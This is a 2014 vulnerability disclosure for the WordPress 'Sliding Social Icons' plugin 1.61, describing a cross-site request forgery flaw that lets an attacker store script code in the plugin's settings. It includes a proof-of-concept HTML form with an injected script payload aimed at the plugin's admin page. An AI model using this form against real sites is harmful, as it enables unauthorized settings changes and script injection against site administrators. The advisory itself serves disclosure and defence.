WordPress Sliding Social Icons plugin version 1.61 suffers from a cross site request forgery vulnerability that can be leveraged to trick an admin into storing cross site scripting code.
07e117089c8d906b6d8d5b4362e33b4c3449ee1ed3e54dbc5dfc5e0107860abc
Title: WordPress 'Sliding Social Icons' plugin - CSRF/XSS
Version: 1.61
Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/sliding-social-icons/
Notified WordPress: 2014/11/27
----------------------------------------------------------------
## Description:
----------------------------------------------------------------
WordPress Sliding Widgets Plugin will help your to create a sliding icon list dynamically where you can place on your website. The icons slide into the screen when you hover over them. This plugin also allows you to enter a shortcode for a contact form or newsletter or any other shortcode, shows up in a sliding screen
## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and then submit the following form.
<form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=wpbs_panel">
<input type="text" name="action" value="wpbs_save_settings"><br />
<input type="text" name="sc_social_slider_margin" value=""><script>alert(1)</script>"><br />
<input type="text" name="sc_social_slider_save" value="Update"><br />
<input type="submit">
</form>
## Solution
----------------------------------------------------------------
No fix available.
The plugin has been closed by WordPress until it is updated.